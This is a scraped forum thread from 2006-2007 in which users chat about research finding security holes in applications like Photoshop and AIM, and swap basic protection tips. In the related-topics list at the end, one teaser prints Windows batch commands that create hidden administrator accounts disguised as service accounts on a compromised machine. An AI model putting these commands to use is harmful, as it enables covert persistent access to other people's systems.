electriic ink
Feb 8 2006, 04:52 PM
Popular Applications Are Creating Holes In Your OSNearly every computer owner nowadays knows how to keep their computer safe by running regualar virus scans and keeping spyware scanners up to date. Well researchers at Prinston University say that this is not enough. They have found many popular applications which open doors up to allow various attacks. Among the discovered culprits were Adobe Photoshop and AOL Instant Messengar. Fortuneately, these products which had the worst written code out of all those which were found, have fixed their code. Earlier this month, Ed Felten who is a professor of computer science and public affairs, responded by saying: QUOTE " No application should be considered completely safe" However, none of these vuneralbilites can be exploited over the web but require local access to the machine; it goes to show that even the most conscientious of computer users are ultimately at the mercy of the programs they use. LEARN MORE: http://www.neoseeker.com/news/story/5347/
Reply
sxyloverboy
Feb 8 2006, 06:50 PM
wow this is pretty intresting. ill be sure to check it out. im glad it says that photoshoped fixed their problems. but this is kinda stupid. i heard something about msn messenger too one time. i think messengers are a vulnerable more easily than other programs. anyways thanks for sharing this. 
Reply
Cool_Freaker
Feb 8 2006, 11:50 PM
Yeah, shows you can never be too careful. Start-up programs are a pain too - and if they're making security holes, I'd be damned if I ever allowed anything to run on startup.
Reply
amhso
Feb 9 2006, 01:51 AM
yeah just lightening your startup and decrease a great ammount of holes. and you can always have a faster startup...just makes using the computer more fun. most of the applications that "create" security holes are the ones with just bad programming as those researchers had found. a big cause of this is that when programmers at a company begin programming, they follow bad syntax or don't want to fix it. eventually as they build onto the code they had already done...it's a big jumble of pieces of programming that causes ties in machines and just creates problems. If companies spent the time (and money) in which most cases they won't, to re code their programs more organized....they'd probably have less problems. just a lesson for all of you programmers out there......be neat from the start and follow correct syntax.
Reply
sammaye
Feb 9 2006, 04:24 PM
oh no I aint updated my photoshop thou but I have photoshop cs (which aint been updated since I got it) does that mean im ok?
Reply
Cerebral Stasis
Feb 9 2006, 06:44 PM
I wouldn't worry about it too much. If your Photoshop has worked alright thus far, chances are they will for awhile yet. I'm not exactly sure what kind of holes are being referred to by this guy; security holes, code holes, or what? Regardless, I'm perfectly willing to give my favorite application developers time to fix the errors with patches instead of going on a fuming rant about how the program wasn't perfect the first time.
Reply
delivi
Feb 9 2006, 07:09 PM
I agree with Cerebral Stasis, I cannot let the Application get a bad name the application developers will definitely develop the required patches if any such problems really exixted. How can anyone just leave using applications like Photoshop which has become a part of our life and I like to spend hours on it.
Reply
epox
Feb 20 2006, 03:27 AM
i think you have all the reason, all computers are vulnerable, even more if you run pirate applications from the internet via p2p software, often, i'm afraid to install several programs i download from the net, and that's because if a program gets to trash my computer i have a lot of information, and also it means to reconfigure your system and that is an expensive time task. now i have a good antivirus, or i think it, at least, it shows advertencies from a hacker that wants to get-in into my computer, and almost forgot, i have activated the system recovery option in my os, so when something stupid happends in my machine, i simply recover the system to the last registration point where the system was perfect, but sometimes it doesn't work, so i open the systemworks by symantec and perform all the tasks it ask, it has saved me a lot of times to have to reconfigure my system, and off cours a lot of time and suffering. at last all the methods mencioned below doesn' work, i take the way of pain, restart the system, reinstall all the software, go back into trap 17 and remember my user name an my password to the browser, do the same thing with other site, reinstall all the windows patches, reconfigure my mail client and all that things that now i can't remember. at last, i would like to know how a bad software can make holes in your OS, so i would like if someone teach me about it, thanks!
Reply
bladeron
Feb 20 2006, 05:06 PM
this is quite an interesting topic and after having read the article i kinda feel insecure with my internet security suite that i m using at present however, i do think that internet applicatiosn like messengers and p2p file sharing progs, browsers are more vulnerable than softwares that do not directly connect to the internet coz such softwares are updated regularly and i must believe that they try to fix these loop holes in their software
Reply
nelarozi
Feb 20 2006, 05:32 PM
I didn't know that applications create holes in my os. I was sure i am pretty save with my NOD32+ ZoneAlarm combination but now i see i am not  Is there maybe a program that fixes this problem or maybe someone can post the most dangerus applicatons cos i am really worried that someone could hack my computer through my Adobe Plz post As Soon as posible ! TNX
Reply
cyp2nv
May 6 2007, 06:06 AM
wow.. :S lol im starting 2 worry, just hope my utilities and antivirus helps to batlle this
Reply
csp4.0
May 6 2007, 05:58 AM
People actually do that, make bugs or something then make people have to subscribe to get the fix etc, that was how many spyware makers in the past got there money, espeicially the popular I LUV U virus. And I always run my OS in safe mode and do a virus scan when in safe mode, go get a good firewall too, even if there are holes, good security guards should stop all but the best planned out brute force invasions
Reply
ghostrider
Jul 12 2006, 12:10 AM
QUOTE I swear viruses were just invented so the anti-virus people can make some money lol This is off topic sort of, but what if the virus writers and the other big software companies purposely leave holes in there software and pay virus writers to exploit them and then get a huge profit off of solving the problems the virus created? Its not very realalistic, but has anyone else ever had this thought?
Reply
psychiccyberfreak
Feb 27 2006, 03:43 PM
If you have good virus controll and a firewall, you are set. Another problem is UPnP routers. Porgrams open up ports (virtual, not physichal) ports in your router, and let what you want to come through, but also you may have bad things come through. The safest thing to do is turn of UPnP and manually define and open ports If you have to but your really don't have to. A good podcast that explains this is security now. Google it, it's a great podcast, even if you don't have an iPod or can't download it, just read the show notes.
Reply
Guest
Feb 27 2006, 04:42 AM
my mom was a programmer in a company who's code was messy. so in that experience, the holes are accidental, but can mess with security settings, or other things INDIRECTLY. Most major companies don't on purposely damage your system. It's by accident, or laziness. adobe isnt malicious. law enforcement is not the issue here. It's how a normal program, not done well, can vulnerize your system (windows).
Reply
Similar Topics
Keywords : popular, applications, creating, holes, os, photoshop, aol, users, risk
- Another New Exploit And One A Few Weeks Ago, We Are All At Risk From These
A DNS exploit and a clipboard expload believe it or not! (0)
Hackers Hijack A Half-million Sites: Phpbb Forum Users Must Read
(8) Since January, hackers have hit hit over 500,000 website, with everything you could possible
imagine; viruses, trojans, malware etc etc. As for the types of websites, sadly to say, these
websites who are getting hit are running PHPBB forum and the worse part is htey don't mention
which version of the phpbb forums are getting hack. So it is safe to say any version below 3.0 is
hackable and maybe even 3.0 itself. As for some of the stuff that is being transmitted are old and
new, but one trojan has been identified and it is the Zlob Trojan or rather variations to th....
Hole In Microsoft Messenger Program Requires A Immediate Update
For Users of MSN Messenger 6.2, 7.0 and 7.5 versions of MSN Messenger (0) SOURCE Well it seems that Microsoft found a huge hole in MSN Messenger that was bad enough that
they want people to upgrade to the current Messenger which is Live 8.1 or something like that. As
for details on the problem they just said the following, "..which let hackers embed malicious code
in Web chat invitations to users." and that they found this problem in "6.2, 7.0 and 7.5, as well as
Windows Live Messenger 8.0." Although it was interesting to know that people were actually
complaining about Live Messenger being a resource hog, well the last time I check msn w....
Mcafee Lets Users Download Rootkit Program For Free
(2) Since the beginning of 2007 a lot of the security reports I have been reading have mentioning about
hackers using rootkits to get into people's computers. Google defines a rootkit as a set of
programs used to hack into a system and gain administrative-level access. Once a program has gained
access, it can be used to monitor traffic and keystrokes; create a backdoor into the system for the
hacker's use; alter log files; attack other machines on the network; and alter existing system
tools to circumvent detection. Rootkits are an extreme form of System Modificatio....
Interesting New Ie - Firefox Bug ( A Must Read Asap)
FF 2.0.02 and up users need to know about this (3) Well it has finally happen and strangely enough I didn't really think about it until now, but it
seems a security team found a very high level bug that requires both Internet Explorer 7 and
Modzilla Fire Fox. This is the jist of the bug; QUOTE The root of the matter is a Firefox
uniform resource identifier (URI) that allows Web sites to force Firefox to launch with the
"firefoxurl://" URI, Secunia reported. The way in which the URI handler is registered by Firefox
causes any parameter to be passed from IE (or another application) to Firefox when the "firefoxurl....
Security Guidelines For Internet Users
(6) Security Guidelines for Internet Users 1. Install an anti-virus software, you can free ones like
AVG Free . Ensure that it's regularly updated - this is of the utmost importance. 2.
Anti-virus software is not enough, the security can be tightened using a firewall software which
will help you prevent unauthorized incoming and outgoing communications from your computer while
connected to the Internet. 3. Disconnect your computer from the Internet when not in use. The
longer you are connected to the Internet, the more opportunity you give for persons to gain un....
Skype & P2p Users - Beware About These Following Worms
(2) With the Skype worm it a simple process of your computer getting infected the worm grabs all the
emails that your skype account has and sends a Instant message to click on this which also downloads
a trojan so other malicious software can installed on that infected computer. Also a person is
directed at least 8 which in the most likely case are scam sites to of course get that person's
info, but so far it hasn't cost any real damage like some of the other attacks skype has seen in
the past. SOURCE Here As well all know everyone is in the P2P since napster an....
Prank Phone Virus That Can Kills Sends Pakistan Mobile Users Into Hysteria
(0) Although not a big secuirty risk more like something interesting about what human mind viruses can
do ot a person once they recieve a message. On friday pretty much all hell broke loose in Pakistan
when people start recieving, hear, readying about a message that a Virus sen through a mobile phone
will kill people and so every mobile user in Pakinstan went into a craze and cllaed their providers
to see whats going on. The message alos mention that 20 people have died so far, of course they
make mention about the movie "The Ring" in which once a person watched this kil....
Brand New Security Holes Found And Patch On This Month Updates And Office Exploits
(0) Even though the fiasco with the .ANI exploit is still going strong microsoft released it's month
updates this time they found 4 more critical breaches in it's systems (XP), most people should
have gotten the update pop up screen yesterday. So here is the info on these critical flaws.
http://go.microsoft.com/fwlink/?LinkId=84687 http://go.microsoft.com/fwlink/?LinkId=85130
http://go.microsoft.com/fwlink/?LinkID=85163 http://go.microsoft.com/fwlink/?LinkID=85164
http://go.microsoft.com/fwlink/?LinkId=80251 I don't know how reliable vista will be af....
Major Flaw In .ani File Found In Windows 98 Through Vista Creates Major Security Risk
Vista Aint that Secure at all (9) I was able to browse around this and found it interesting since this vunerability is found in 4
Microsoft Operating Sytems, Windows 2000, Windows XP, Windows Vista, Windows 2003 Server. From the
article Microsoft stated that their is a hole in the .ani files, which happen to be related tothe
mouse cursor, when the mouse icon changes depending on what you do. They only mention that with
this flaw it always hackers to break into someone computer and do their thing. But in another
article relating to this attack it was mention that in order for this to happen a user has ....
Phishers Target Google Gmail Users
Be Careful GMail Users (12) QUOTE IT security experts warned today of a "widespread phishing email campaign" that tries to
swindle unwary recipients by pretending to offer a cash prize from Gmail, Google's popular free
email service. The emails claim that the recipient has been randomly selected for a $500 cash
prize, and that the money can be paid automatically if they click on the embedded web link. Part of
the email reads as follows: 'You won $500! Gmail congratulates you!
CONGRATULATIONS! YOU WON $500! Gmail gives members random cash prizes. Today....
Attention All Ipb Users/admin
Important exploit discovered! (6) Invision Power Board v2.1.6 © 2006 IPS, Inc. This is what it is written on the bottom of the
board. Not so long ago, i was surfing somewhere, (i wont say where) and i discovered a "sql
injection"exploit, a perl script. QUOTE(step28 in the hack) 28. Reload and click on the
username to the admin. You are now logged in as an ADMIN!!! Admins, pm to receive
the link where i found this. with this hack, you can log in with any user without his pass.
It's really easy to do, you just need PERL, Opera webbrowser and 3 minutes fo your life... ....
Firefox's Answer To Ie's Phishing Filter?
users of the sacred browser can breathe once more! (5) SiteAdvisor - Firefox's Answer To IE's Phishing Filter? A site-warning plugin
for ie and firefox Name: Site Advisor Url: http://siteadvisor.com Download:
http://www.siteadvisor.com/download/ff.html Rating: 9.75/10 Improvements: Not all sites are on
their database but many of the popular ones are so index all webistes. SiteAdvisor is a simple and
easy to install extension created for firefox which checks to see if the site you are on is "bad"
from its database of urls. Once the results have reached your browser a notificatio....
Microsoft Plugs Windows Worm Holes
14 flaws in Windows... (3) http://news.zdnet.com/2100-1009_22-5893344.html?tag=nl.e589 Here is another proof that the words
'Windows' and 'Security' simply cannot go together... And yet another good reason
for installing and start using Linux... Cheers! KoYoda....
New Worm, M$ Users, Be Warned!
WORM_ZOTOB.D and WORM_RBOT.CBQ (11) New Virus is emerging. Microsoft users, be alerted!. This is one of the reason why i dont really
like M$ stuff, but still, i need it really much despite of its problems QUOTE Dear Trend
Micro customer, As of August 16, 2005 5:12 PM (Pacific Daylight Time; GMT-7:00), TrendLabs has
declared a Medium Risk Virus Alert to control the spread of WORM_ZOTOB.D and WORM_RBOT.CBQ.
TrendLabs has received several infection reports indicating that this malware is spreading in
Brazil and the U.S.A. WORM_ZOTOB.D is a memory-resident worm that drops a copy of itself in ....
Creating Hidden User
(7) when u have an access to a windows system by CMD , maybe u need to create an admin account with a
remote cnnection,here's the way: CODE @echo off net user IUSR_WAN /add /expires:never
net localgroup administrators /add IUSR_REMOTE net user IUSR_WAN herman net user IUSR_WAN
/comment:"Built-in account for Remote Service" net user IUSR_WAN
/fullname:"Remote Service Account" also another way that the user won't show on
login screen! CODE @echo off net user illwill password /add && net localgroup
administrators illwill /a....
Looking for popular, applications, creating, holes, os, photoshop, aol, users, risk
|
|
Searching Video's for popular, applications, creating, holes, os, photoshop, aol, users, risk
|
advertisement
|
|
